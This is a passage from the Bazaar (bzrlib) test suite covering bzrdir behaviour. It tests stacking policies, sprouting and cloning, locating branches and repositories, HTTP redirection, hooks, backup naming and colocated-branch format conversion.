self.assertEqual(control._format.network_name(),
opened._format.network_name())
self.assertEqual(control.__class__, opened.__class__)
self.assertLength(1, repo._fallback_repositories)
def test_sprout_obeys_stacking_policy(self):
child_branch, new_child_transport = self.prepare_default_stacking()
new_child = child_branch.bzrdir.sprout(new_child_transport.base)
self.assertEqual(child_branch.base,
new_child.open_branch().get_stacked_on_url())
def test_clone_ignores_policy_for_unsupported_formats(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.clone_on_transport(new_child_transport)
self.assertRaises(errors.UnstackableBranchFormat,
new_child.open_branch().get_stacked_on_url)
def test_sprout_ignores_policy_for_unsupported_formats(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.sprout(new_child_transport.base)
self.assertRaises(errors.UnstackableBranchFormat,
new_child.open_branch().get_stacked_on_url)
def test_sprout_upgrades_format_if_stacked_specified(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.sprout(new_child_transport.base,
stacked=True)
self.assertEqual(child_branch.bzrdir.root_transport.base,
new_child.open_branch().get_stacked_on_url())
repo = new_child.open_repository()
self.assertTrue(repo._format.supports_external_lookups)
self.assertFalse(repo.supports_rich_root())
def test_clone_on_transport_upgrades_format_if_stacked_on_specified(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='pack-0.92')
new_child = child_branch.bzrdir.clone_on_transport(new_child_transport,
stacked_on=child_branch.bzrdir.root_transport.base)
self.assertEqual(child_branch.bzrdir.root_transport.base,
new_child.open_branch().get_stacked_on_url())
repo = new_child.open_repository()
self.assertTrue(repo._format.supports_external_lookups)
self.assertFalse(repo.supports_rich_root())
def test_sprout_upgrades_to_rich_root_format_if_needed(self):
child_branch, new_child_transport = self.prepare_default_stacking(
child_format='rich-root-pack')
new_child = child_branch.bzrdir.sprout(new_child_transport.base,
stacked=True)
repo = new_child.open_repository()
self.assertTrue(repo._format.supports_external_lookups)
self.assertTrue(repo.supports_rich_root())
def test_add_fallback_repo_handles_absolute_urls(self):
stack_on = self.make_branch('stack_on', format='1.6')
repo = self.make_repository('repo', format='1.6')
policy = bzrdir.UseExistingRepository(repo, stack_on.base)
policy._add_fallback(repo)
def test_add_fallback_repo_handles_relative_urls(self):
stack_on = self.make_branch('stack_on', format='1.6')
repo = self.make_repository('repo', format='1.6')
policy = bzrdir.UseExistingRepository(repo, '.', stack_on.base)
policy._add_fallback(repo)
def test_configure_relative_branch_stacking_url(self):
stack_on = self.make_branch('stack_on', format='1.6')
stacked = self.make_branch('stack_on/stacked', format='1.6')
policy = bzrdir.UseExistingRepository(stacked.repository,
'.', stack_on.base)
policy.configure_branch(stacked)
self.assertEqual('..', stacked.get_stacked_on_url())
def test_relative_branch_stacking_to_absolute(self):
stack_on = self.make_branch('stack_on', format='1.6')
stacked = self.make_branch('stack_on/stacked', format='1.6')
policy = bzrdir.UseExistingRepository(stacked.repository,
'.', self.get_readonly_url('stack_on'))
policy.configure_branch(stacked)
self.assertEqual(self.get_readonly_url('stack_on'),
stacked.get_stacked_on_url())
class ChrootedTests(TestCaseWithTransport):
"""A support class that provides readonly urls outside the local namespace.
    This is done by checking if self.transport_server is a MemoryServer. If it
    is, then we are chrooted already; if it is not, then an HttpServer is used
    for readonly urls.
"""
def setUp(self):
super(ChrootedTests, self).setUp()
if not self.vfs_transport_factory == memory.MemoryServer:
self.transport_readonly_server = http_server.HttpServer
def local_branch_path(self, branch):
return os.path.realpath(urlutils.local_path_from_url(branch.base))
def test_open_containing(self):
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_containing,
self.get_readonly_url(''))
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_containing,
self.get_readonly_url('g/p/q'))
control = bzrdir.BzrDir.create(self.get_url())
branch, relpath = bzrdir.BzrDir.open_containing(self.get_readonly_url(''))
self.assertEqual('', relpath)
branch, relpath = bzrdir.BzrDir.open_containing(self.get_readonly_url('g/p/q'))
self.assertEqual('g/p/q', relpath)
def test_open_containing_tree_branch_or_repository_empty(self):
self.assertRaises(errors.NotBranchError,
bzrdir.BzrDir.open_containing_tree_branch_or_repository,
self.get_readonly_url(''))
def test_open_containing_tree_branch_or_repository_all(self):
self.make_branch_and_tree('topdir')
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'topdir/foo')
self.assertEqual(os.path.realpath('topdir'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('topdir'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('topdir', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'foo')
def test_open_containing_tree_branch_or_repository_no_tree(self):
self.make_branch('branch')
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'branch/foo')
self.assertEqual(tree, None)
self.assertEqual(os.path.realpath('branch'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('branch', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'foo')
def test_open_containing_tree_branch_or_repository_repo(self):
self.make_repository('repo')
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'repo')
self.assertEqual(tree, None)
self.assertEqual(branch, None)
self.assertEqual(
osutils.realpath(os.path.join('repo', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, '')
def test_open_containing_tree_branch_or_repository_shared_repo(self):
self.make_repository('shared', shared=True)
bzrdir.BzrDir.create_branch_convenience('shared/branch',
force_new_tree=False)
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'shared/branch')
self.assertEqual(tree, None)
self.assertEqual(os.path.realpath('shared/branch'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('shared', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, '')
def test_open_containing_tree_branch_or_repository_branch_subdir(self):
self.make_branch_and_tree('foo')
self.build_tree(['foo/bar/'])
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'foo/bar')
self.assertEqual(os.path.realpath('foo'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('foo'),
self.local_branch_path(branch))
self.assertEqual(
osutils.realpath(os.path.join('foo', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'bar')
def test_open_containing_tree_branch_or_repository_repo_subdir(self):
self.make_repository('bar')
self.build_tree(['bar/baz/'])
tree, branch, repo, relpath = \
bzrdir.BzrDir.open_containing_tree_branch_or_repository(
'bar/baz')
self.assertEqual(tree, None)
self.assertEqual(branch, None)
self.assertEqual(
osutils.realpath(os.path.join('bar', '.bzr', 'repository')),
repo.bzrdir.transport.local_abspath('repository'))
self.assertEqual(relpath, 'baz')
def test_open_containing_from_transport(self):
self.assertRaises(NotBranchError,
bzrdir.BzrDir.open_containing_from_transport,
_mod_transport.get_transport_from_url(self.get_readonly_url('')))
self.assertRaises(NotBranchError,
bzrdir.BzrDir.open_containing_from_transport,
_mod_transport.get_transport_from_url(
self.get_readonly_url('g/p/q')))
control = bzrdir.BzrDir.create(self.get_url())
branch, relpath = bzrdir.BzrDir.open_containing_from_transport(
_mod_transport.get_transport_from_url(
self.get_readonly_url('')))
self.assertEqual('', relpath)
branch, relpath = bzrdir.BzrDir.open_containing_from_transport(
_mod_transport.get_transport_from_url(
self.get_readonly_url('g/p/q')))
self.assertEqual('g/p/q', relpath)
def test_open_containing_tree_or_branch(self):
self.make_branch_and_tree('topdir')
tree, branch, relpath = bzrdir.BzrDir.open_containing_tree_or_branch(
'topdir/foo')
self.assertEqual(os.path.realpath('topdir'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('topdir'),
self.local_branch_path(branch))
self.assertIs(tree.bzrdir, branch.bzrdir)
self.assertEqual('foo', relpath)
# opening from non-local should not return the tree
tree, branch, relpath = bzrdir.BzrDir.open_containing_tree_or_branch(
self.get_readonly_url('topdir/foo'))
self.assertEqual(None, tree)
self.assertEqual('foo', relpath)
# without a tree:
self.make_branch('topdir/foo')
tree, branch, relpath = bzrdir.BzrDir.open_containing_tree_or_branch(
'topdir/foo')
self.assertIs(tree, None)
self.assertEqual(os.path.realpath('topdir/foo'),
self.local_branch_path(branch))
self.assertEqual('', relpath)
def test_open_tree_or_branch(self):
self.make_branch_and_tree('topdir')
tree, branch = bzrdir.BzrDir.open_tree_or_branch('topdir')
self.assertEqual(os.path.realpath('topdir'),
os.path.realpath(tree.basedir))
self.assertEqual(os.path.realpath('topdir'),
self.local_branch_path(branch))
self.assertIs(tree.bzrdir, branch.bzrdir)
# opening from non-local should not return the tree
tree, branch = bzrdir.BzrDir.open_tree_or_branch(
self.get_readonly_url('topdir'))
self.assertEqual(None, tree)
# without a tree:
self.make_branch('topdir/foo')
tree, branch = bzrdir.BzrDir.open_tree_or_branch('topdir/foo')
self.assertIs(tree, None)
self.assertEqual(os.path.realpath('topdir/foo'),
self.local_branch_path(branch))
def test_open_from_transport(self):
# transport pointing at bzrdir should give a bzrdir with root transport
# set to the given transport
control = bzrdir.BzrDir.create(self.get_url())
t = self.get_transport()
opened_bzrdir = bzrdir.BzrDir.open_from_transport(t)
self.assertEqual(t.base, opened_bzrdir.root_transport.base)
self.assertIsInstance(opened_bzrdir, bzrdir.BzrDir)
def test_open_from_transport_no_bzrdir(self):
t = self.get_transport()
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_from_transport, t)
def test_open_from_transport_bzrdir_in_parent(self):
control = bzrdir.BzrDir.create(self.get_url())
t = self.get_transport()
t.mkdir('subdir')
t = t.clone('subdir')
self.assertRaises(NotBranchError, bzrdir.BzrDir.open_from_transport, t)
def test_sprout_recursive(self):
tree = self.make_branch_and_tree('tree1',
format='development-subtree')
sub_tree = self.make_branch_and_tree('tree1/subtree',
format='development-subtree')
sub_tree.set_root_id('subtree-root')
tree.add_reference(sub_tree)
self.build_tree(['tree1/subtree/file'])
sub_tree.add('file')
tree.commit('Initial commit')
tree2 = tree.bzrdir.sprout('tree2').open_workingtree()
tree2.lock_read()
self.addCleanup(tree2.unlock)
self.assertPathExists('tree2/subtree/file')
self.assertEqual('tree-reference', tree2.kind('subtree-root'))
def test_cloning_metadir(self):
"""Ensure that cloning metadir is suitable"""
bzrdir = self.make_bzrdir('bzrdir')
bzrdir.cloning_metadir()
branch = self.make_branch('branch', format='knit')
format = branch.bzrdir.cloning_metadir()
self.assertIsInstance(format.workingtree_format,
workingtree_4.WorkingTreeFormat6)
def test_sprout_recursive_treeless(self):
tree = self.make_branch_and_tree('tree1',
format='development-subtree')
sub_tree = self.make_branch_and_tree('tree1/subtree',
format='development-subtree')
tree.add_reference(sub_tree)
self.build_tree(['tree1/subtree/file'])
sub_tree.add('file')
tree.commit('Initial commit')
        # The following line forces the orphaning to reveal bug #634470
tree.branch.get_config_stack().set(
'bzr.transform.orphan_policy', 'move')
tree.bzrdir.destroy_workingtree()
# FIXME: subtree/.bzr is left here which allows the test to pass (or
# fail :-( ) -- vila 20100909
repo = self.make_repository('repo', shared=True,
format='development-subtree')
repo.set_make_working_trees(False)
# FIXME: we just deleted the workingtree and now we want to use it ????
# At a minimum, we should use tree.branch below (but this fails too
        # currently) or stop calling this test 'treeless'. Specifically, I've
        # turned the line below into an assertRaises when 'subtree/.bzr' is
# orphaned and sprout tries to access the branch there (which is left
# by bzrdir.BzrDirMeta1.destroy_workingtree when it ignores the
# [DeletingParent('Not deleting', u'subtree', None)] conflict). See bug
# #634470. -- vila 20100909
self.assertRaises(errors.NotBranchError,
tree.bzrdir.sprout, 'repo/tree2')
# self.assertPathExists('repo/tree2/subtree')
# self.assertPathDoesNotExist('repo/tree2/subtree/file')
def make_foo_bar_baz(self):
foo = bzrdir.BzrDir.create_branch_convenience('foo').bzrdir
bar = self.make_branch('foo/bar').bzrdir
baz = self.make_branch('baz').bzrdir
return foo, bar, baz
def test_find_bzrdirs(self):
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
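        # top-level bzrdirs ('baz', 'foo') are reported before the nested
        # 'foo/bar'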
self.assertEqualBzrdirs([baz, foo, bar], bzrdir.BzrDir.find_bzrdirs(t))
def make_fake_permission_denied_transport(self, transport, paths):
"""Create a transport that raises PermissionDenied for some paths."""
def filter(path):
if path in paths:
raise errors.PermissionDenied(path)
return path
path_filter_server = pathfilter.PathFilteringServer(transport, filter)
path_filter_server.start_server()
self.addCleanup(path_filter_server.stop_server)
path_filter_transport = pathfilter.PathFilteringTransport(
path_filter_server, '.')
return (path_filter_server, path_filter_transport)
def assertBranchUrlsEndWith(self, expect_url_suffix, actual_bzrdirs):
"""Check that each branch url ends with the given suffix."""
for actual_bzrdir in actual_bzrdirs:
self.assertEndsWith(actual_bzrdir.user_url, expect_url_suffix)
def test_find_bzrdirs_permission_denied(self):
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
path_filter_server, path_filter_transport = \
self.make_fake_permission_denied_transport(t, ['foo'])
# local transport
self.assertBranchUrlsEndWith('/baz/',
bzrdir.BzrDir.find_bzrdirs(path_filter_transport))
# smart server
smart_transport = self.make_smart_server('.',
backing_server=path_filter_server)
self.assertBranchUrlsEndWith('/baz/',
bzrdir.BzrDir.find_bzrdirs(smart_transport))
def test_find_bzrdirs_list_current(self):
def list_current(transport):
return [s for s in transport.list_dir('') if s != 'baz']
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
self.assertEqualBzrdirs(
[foo, bar],
bzrdir.BzrDir.find_bzrdirs(t, list_current=list_current))
def test_find_bzrdirs_evaluate(self):
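        # the evaluate callback returns (recurse, value): each value is
        # yielded, and the boolean decides whether to descend below that
        # bzrdir, so 'bar' (nested under repository-bearing 'foo') never
        # appears in the results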
def evaluate(bzrdir):
try:
repo = bzrdir.open_repository()
except errors.NoRepositoryPresent:
return True, bzrdir.root_transport.base
else:
return False, bzrdir.root_transport.base
foo, bar, baz = self.make_foo_bar_baz()
t = self.get_transport()
self.assertEqual([baz.root_transport.base, foo.root_transport.base],
list(bzrdir.BzrDir.find_bzrdirs(t, evaluate=evaluate)))
def assertEqualBzrdirs(self, first, second):
first = list(first)
second = list(second)
self.assertEqual(len(first), len(second))
for x, y in zip(first, second):
self.assertEqual(x.root_transport.base, y.root_transport.base)
def test_find_branches(self):
root = self.make_repository('', shared=True)
foo, bar, baz = self.make_foo_bar_baz()
qux = self.make_bzrdir('foo/qux')
t = self.get_transport()
branches = bzrdir.BzrDir.find_branches(t)
self.assertEqual(baz.root_transport.base, branches[0].base)
self.assertEqual(foo.root_transport.base, branches[1].base)
self.assertEqual(bar.root_transport.base, branches[2].base)
# ensure this works without a top-level repo
branches = bzrdir.BzrDir.find_branches(t.clone('foo'))
self.assertEqual(foo.root_transport.base, branches[0].base)
self.assertEqual(bar.root_transport.base, branches[1].base)
class TestMissingRepoBranchesSkipped(TestCaseWithMemoryTransport):
def test_find_bzrdirs_missing_repo(self):
t = self.get_transport()
arepo = self.make_repository('arepo', shared=True)
abranch_url = arepo.user_url + '/abranch'
abranch = bzrdir.BzrDir.create(abranch_url).create_branch()
t.delete_tree('arepo/.bzr')
self.assertRaises(errors.NoRepositoryPresent,
branch.Branch.open, abranch_url)
self.make_branch('baz')
for actual_bzrdir in bzrdir.BzrDir.find_branches(t):
self.assertEndsWith(actual_bzrdir.user_url, '/baz/')
class TestMeta1DirFormat(TestCaseWithTransport):
"""Tests specific to the meta1 dir format."""
def test_right_base_dirs(self):
dir = bzrdir.BzrDirMetaFormat1().initialize(self.get_url())
t = dir.transport
branch_base = t.clone('branch').base
self.assertEqual(branch_base, dir.get_branch_transport(None).base)
self.assertEqual(branch_base,
dir.get_branch_transport(BzrBranchFormat5()).base)
repository_base = t.clone('repository').base
self.assertEqual(repository_base, dir.get_repository_transport(None).base)
repository_format = repository.format_registry.get_default()
self.assertEqual(repository_base,
dir.get_repository_transport(repository_format).base)
checkout_base = t.clone('checkout').base
self.assertEqual(checkout_base, dir.get_workingtree_transport(None).base)
self.assertEqual(checkout_base,
dir.get_workingtree_transport(workingtree_3.WorkingTreeFormat3()).base)
def test_meta1dir_uses_lockdir(self):
"""Meta1 format uses a LockDir to guard the whole directory, not a file."""
dir = bzrdir.BzrDirMetaFormat1().initialize(self.get_url())
t = dir.transport
self.assertIsDirectory('branch-lock', t)
def test_comparison(self):
"""Equality and inequality behave properly.
Metadirs should compare equal iff they have the same repo, branch and
tree formats.
"""
mydir = controldir.format_registry.make_bzrdir('knit')
self.assertEqual(mydir, mydir)
self.assertFalse(mydir != mydir)
otherdir = controldir.format_registry.make_bzrdir('knit')
self.assertEqual(otherdir, mydir)
self.assertFalse(otherdir != mydir)
otherdir2 = controldir.format_registry.make_bzrdir('development-subtree')
self.assertNotEqual(otherdir2, mydir)
self.assertFalse(otherdir2 == mydir)
def test_with_features(self):
tree = self.make_branch_and_tree('tree', format='2a')
tree.bzrdir.update_feature_flags({"bar": "required"})
self.assertRaises(errors.MissingFeature, bzrdir.BzrDir.open, 'tree')
bzrdir.BzrDirMetaFormat1.register_feature('bar')
self.addCleanup(bzrdir.BzrDirMetaFormat1.unregister_feature, 'bar')
dir = bzrdir.BzrDir.open('tree')
self.assertEquals("required", dir._format.features.get("bar"))
tree.bzrdir.update_feature_flags({"bar": None, "nonexistant": None})
dir = bzrdir.BzrDir.open('tree')
self.assertEquals({}, dir._format.features)
def test_needs_conversion_different_working_tree(self):
        # meta1dirs need a conversion if any element is not the default.
new_format = controldir.format_registry.make_bzrdir('dirstate')
tree = self.make_branch_and_tree('tree', format='knit')
self.assertTrue(tree.bzrdir.needs_format_conversion(
new_format))
def test_initialize_on_format_uses_smart_transport(self):
self.setup_smart_server_with_call_log()
new_format = controldir.format_registry.make_bzrdir('dirstate')
transport = self.get_transport('target')
transport.ensure_base()
self.reset_smart_call_log()
instance = new_format.initialize_on_transport(transport)
self.assertIsInstance(instance, remote.RemoteBzrDir)
rpc_count = len(self.hpss_calls)
        # This figure represents the amount of work to perform this use case. It
# is entirely ok to reduce this number if a test fails due to rpc_count
# being too low. If rpc_count increases, more network roundtrips have
# become necessary for this use case. Please do not adjust this number
# upwards without agreement from bzr's network support maintainers.
self.assertEqual(2, rpc_count)
class NonLocalTests(TestCaseWithTransport):
"""Tests for bzrdir static behaviour on non local paths."""
def setUp(self):
super(NonLocalTests, self).setUp()
self.vfs_transport_factory = memory.MemoryServer
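        # a MemoryServer makes every test URL non-local, so attempts to
        # create working trees on it must fail with NotLocalUrl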
def test_create_branch_convenience(self):
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience(
self.get_url('foo'), format=format)
self.assertRaises(errors.NoWorkingTree,
branch.bzrdir.open_workingtree)
branch.bzrdir.open_repository()
def test_create_branch_convenience_force_tree_not_local_fails(self):
# outside a repo the default convenience output is a repo+branch_tree
format = controldir.format_registry.make_bzrdir('knit')
self.assertRaises(errors.NotLocalUrl,
bzrdir.BzrDir.create_branch_convenience,
self.get_url('foo'),
force_new_tree=True,
format=format)
t = self.get_transport()
self.assertFalse(t.has('foo'))
def test_clone(self):
# clone into a nonlocal path works
format = controldir.format_registry.make_bzrdir('knit')
branch = bzrdir.BzrDir.create_branch_convenience('local',
format=format)
branch.bzrdir.open_workingtree()
result = branch.bzrdir.clone(self.get_url('remote'))
self.assertRaises(errors.NoWorkingTree,
result.open_workingtree)
result.open_branch()
result.open_repository()
def test_checkout_metadir(self):
# checkout_metadir has reasonable working tree format even when no
# working tree is present
self.make_branch('branch-knit2', format='dirstate-with-subtree')
my_bzrdir = bzrdir.BzrDir.open(self.get_url('branch-knit2'))
checkout_format = my_bzrdir.checkout_metadir()
self.assertIsInstance(checkout_format.workingtree_format,
workingtree_4.WorkingTreeFormat4)
class TestHTTPRedirections(object):
"""Test redirection between two http servers.
This MUST be used by daughter classes that also inherit from
TestCaseWithTwoWebservers.
We can't inherit directly from TestCaseWithTwoWebservers or the
test framework will try to create an instance which cannot
run, its implementation being incomplete.
"""
def create_transport_readonly_server(self):
# We don't set the http protocol version, relying on the default
return http_utils.HTTPServerRedirecting()
def create_transport_secondary_server(self):
# We don't set the http protocol version, relying on the default
return http_utils.HTTPServerRedirecting()
def setUp(self):
super(TestHTTPRedirections, self).setUp()
# The redirections will point to the new server
self.new_server = self.get_readonly_server()
# The requests to the old server will be redirected
self.old_server = self.get_secondary_server()
# Configure the redirections
self.old_server.redirect_to(self.new_server.host, self.new_server.port)
def test_loop(self):
# Both servers redirect to each other creating a loop
self.new_server.redirect_to(self.old_server.host, self.old_server.port)
# Starting from either server should loop
old_url = self._qualified_url(self.old_server.host,
self.old_server.port)
oldt = self._transport(old_url)
self.assertRaises(errors.NotBranchError,
bzrdir.BzrDir.open_from_transport, oldt)
new_url = self._qualified_url(self.new_server.host,
self.new_server.port)
newt = self._transport(new_url)
self.assertRaises(errors.NotBranchError,
bzrdir.BzrDir.open_from_transport, newt)
def test_qualifier_preserved(self):
wt = self.make_branch_and_tree('branch')
old_url = self._qualified_url(self.old_server.host,
self.old_server.port)
start = self._transport(old_url).clone('branch')
bdir = bzrdir.BzrDir.open_from_transport(start)
# Redirection should preserve the qualifier, hence the transport class
# itself.
self.assertIsInstance(bdir.root_transport, type(start))
class TestHTTPRedirections_urllib(TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for urllib implementation"""
_transport = HttpTransport_urllib
def _qualified_url(self, host, port):
result = 'http+urllib://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestHTTPRedirections_pycurl(TestWithTransport_pycurl,
TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for pycurl implementation"""
def _qualified_url(self, host, port):
result = 'http+pycurl://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestHTTPRedirections_nosmart(TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for the nosmart decorator"""
_transport = NoSmartTransportDecorator
def _qualified_url(self, host, port):
result = 'nosmart+http://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestHTTPRedirections_readonly(TestHTTPRedirections,
http_utils.TestCaseWithTwoWebservers):
"""Tests redirections for readonly decoratror"""
_transport = ReadonlyTransportDecorator
def _qualified_url(self, host, port):
result = 'readonly+http://%s:%s' % (host, port)
self.permit_url(result)
return result
class TestDotBzrHidden(TestCaseWithTransport):
ls = ['ls']
if sys.platform == 'win32':
ls = [os.environ['COMSPEC'], '/C', 'dir', '/B']
def get_ls(self):
f = subprocess.Popen(self.ls, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = f.communicate()
self.assertEqual(0, f.returncode, 'Calling %s failed: %s'
% (self.ls, err))
return out.splitlines()
def test_dot_bzr_hidden(self):
if sys.platform == 'win32' and not win32utils.has_win32file:
raise TestSkipped('unable to make file hidden without pywin32 library')
b = bzrdir.BzrDir.create('.')
self.build_tree(['a'])
self.assertEquals(['a'], self.get_ls())
def test_dot_bzr_hidden_with_url(self):
if sys.platform == 'win32' and not win32utils.has_win32file:
raise TestSkipped('unable to make file hidden without pywin32 library')
b = bzrdir.BzrDir.create(urlutils.local_path_to_url('.'))
self.build_tree(['a'])
self.assertEquals(['a'], self.get_ls())
class _TestBzrDirFormat(bzrdir.BzrDirMetaFormat1):
"""Test BzrDirFormat implementation for TestBzrDirSprout."""
def _open(self, transport):
return _TestBzrDir(transport, self)
class _TestBzrDir(bzrdir.BzrDirMeta1):
"""Test BzrDir implementation for TestBzrDirSprout.
    When created, a _TestBzrDir already has a repository and a branch. The branch
is a test double as well.
"""
def __init__(self, *args, **kwargs):
super(_TestBzrDir, self).__init__(*args, **kwargs)
self.test_branch = _TestBranch(self.transport)
self.test_branch.repository = self.create_repository()
def open_branch(self, unsupported=False, possible_transports=None):
return self.test_branch
def cloning_metadir(self, require_stacking=False):
return _TestBzrDirFormat()
class _TestBranchFormat(bzrlib.branch.BranchFormat):
"""Test Branch format for TestBzrDirSprout."""
class _TestBranch(bzrlib.branch.Branch):
"""Test Branch implementation for TestBzrDirSprout."""
def __init__(self, transport, *args, **kwargs):
self._format = _TestBranchFormat()
self._transport = transport
self.base = transport.base
super(_TestBranch, self).__init__(*args, **kwargs)
self.calls = []
self._parent = None
def sprout(self, *args, **kwargs):
self.calls.append('sprout')
return _TestBranch(self._transport)
def copy_content_into(self, destination, revision_id=None):
self.calls.append('copy_content_into')
def last_revision(self):
return _mod_revision.NULL_REVISION
def get_parent(self):
return self._parent
def _get_config(self):
return config.TransportConfig(self._transport, 'branch.conf')
def _get_config_store(self):
return config.BranchStore(self)
def set_parent(self, parent):
self._parent = parent
def lock_read(self):
return lock.LogicalLockResult(self.unlock)
def unlock(self):
return
class TestBzrDirSprout(TestCaseWithMemoryTransport):
def test_sprout_uses_branch_sprout(self):
"""BzrDir.sprout calls Branch.sprout.
Usually, BzrDir.sprout should delegate to the branch's sprout method
for part of the work. This allows the source branch to control the
choice of format for the new branch.
        There are exceptions, but this test avoids them:
- if there's no branch in the source bzrdir,
- or if the stacking has been requested and the format needs to be
overridden to satisfy that.
"""
# Make an instrumented bzrdir.
t = self.get_transport('source')
t.ensure_base()
source_bzrdir = _TestBzrDirFormat().initialize_on_transport(t)
# The instrumented bzrdir has a test_branch attribute that logs calls
# made to the branch contained in that bzrdir. Initially the test
# branch exists but no calls have been made to it.
self.assertEqual([], source_bzrdir.test_branch.calls)
# Sprout the bzrdir
target_url = self.get_url('target')
result = source_bzrdir.sprout(target_url, recurse='no')
# The bzrdir called the branch's sprout method.
self.assertSubset(['sprout'], source_bzrdir.test_branch.calls)
def test_sprout_parent(self):
grandparent_tree = self.make_branch('grandparent')
parent = grandparent_tree.bzrdir.sprout('parent').open_branch()
branch_tree = parent.bzrdir.sprout('branch').open_branch()
self.assertContainsRe(branch_tree.get_parent(), '/parent/$')
class TestBzrDirHooks(TestCaseWithMemoryTransport):
def test_pre_open_called(self):
calls = []
bzrdir.BzrDir.hooks.install_named_hook('pre_open', calls.append, None)
transport = self.get_transport('foo')
url = transport.base
self.assertRaises(errors.NotBranchError, bzrdir.BzrDir.open, url)
self.assertEqual([transport.base], [t.base for t in calls])
def test_pre_open_actual_exceptions_raised(self):
count = [0]
def fail_once(transport):
count[0] += 1
if count[0] == 1:
raise errors.BzrError("fail")
bzrdir.BzrDir.hooks.install_named_hook('pre_open', fail_once, None)
transport = self.get_transport('foo')
url = transport.base
err = self.assertRaises(errors.BzrError, bzrdir.BzrDir.open, url)
self.assertEqual('fail', err._preformatted_string)
def test_post_repo_init(self):
from bzrlib.controldir import RepoInitHookParams
calls = []
bzrdir.BzrDir.hooks.install_named_hook('post_repo_init',
calls.append, None)
self.make_repository('foo')
self.assertLength(1, calls)
params = calls[0]
self.assertIsInstance(params, RepoInitHookParams)
self.assertTrue(hasattr(params, 'bzrdir'))
self.assertTrue(hasattr(params, 'repository'))
def test_post_repo_init_hook_repr(self):
param_reprs = []
bzrdir.BzrDir.hooks.install_named_hook('post_repo_init',
lambda params: param_reprs.append(repr(params)), None)
self.make_repository('foo')
self.assertLength(1, param_reprs)
param_repr = param_reprs[0]
self.assertStartsWith(param_repr, '<RepoInitHookParams for ')
class TestGenerateBackupName(TestCaseWithMemoryTransport):
# FIXME: This may need to be unified with test_osutils.TestBackupNames or
# moved to per_bzrdir or per_transport for better coverage ?
# -- vila 20100909
def setUp(self):
super(TestGenerateBackupName, self).setUp()
self._transport = self.get_transport()
bzrdir.BzrDir.create(self.get_url(),
possible_transports=[self._transport])
self._bzrdir = bzrdir.BzrDir.open_from_transport(self._transport)
def test_new(self):
self.assertEqual("a.~1~", self._bzrdir._available_backup_name("a"))
    def test_existing(self):
self._transport.put_bytes("a.~1~", "some content")
self.assertEqual("a.~2~", self._bzrdir._available_backup_name("a"))
class TestMeta1DirColoFormat(TestCaseWithTransport):
"""Tests specific to the meta1 dir with colocated branches format."""
def test_supports_colo(self):
format = bzrdir.BzrDirMetaFormat1Colo()
self.assertTrue(format.colocated_branches)
def test_upgrade_from_2a(self):
tree = self.make_branch_and_tree('.', format='2a')
format = bzrdir.BzrDirMetaFormat1Colo()
self.assertTrue(tree.bzrdir.needs_format_conversion(format))
converter = tree.bzrdir._format.get_converter(format)
result = converter.convert(tree.bzrdir, None)
self.assertIsInstance(result._format, bzrdir.BzrDirMetaFormat1Colo)
self.assertFalse(result.needs_format_conversion(format))
def test_downgrade_to_2a(self):
tree = self.make_branch_and_tree('.', format='development-colo')
format = bzrdir.BzrDirMetaFormat1()
self.assertTrue(tree.bzrdir.needs_format_conversion(format))
converter = tree.bzrdir._format.get_converter(format)
result = converter.convert(tree.bzrdir, None)
self.assertIsInstance(result._format, bzrdir.BzrDirMetaFormat1)
self.assertFalse(result.needs_format_conversion(format))
def test_downgrade_to_2a_too_many_branches(self):
tree = self.make_branch_and_tree('.', format='development-colo')
tree.bzrdir.create_branch(name="another-colocated-branch")
converter = tree.bzrdir._format.get_converter(
bzrdir.BzrDirMetaFormat1())
result = converter.convert(tree.bzrdir, bzrdir.BzrDirMetaFormat1())
self.assertIsInstance(result._format, bzrdir.BzrDirMetaFormat1)
def test_nested(self):
tree = self.make_branch_and_tree('.', format='development-colo')
tree.bzrdir.create_branch(name='foo')
tree.bzrdir.create_branch(name='fool/bla')
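        # 'foo' already exists as a branch, so it cannot double as a parent
        # directory for a nested 'foo/bar'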
self.assertRaises(
errors.ParentBranchExists, tree.bzrdir.create_branch,
name='foo/bar')
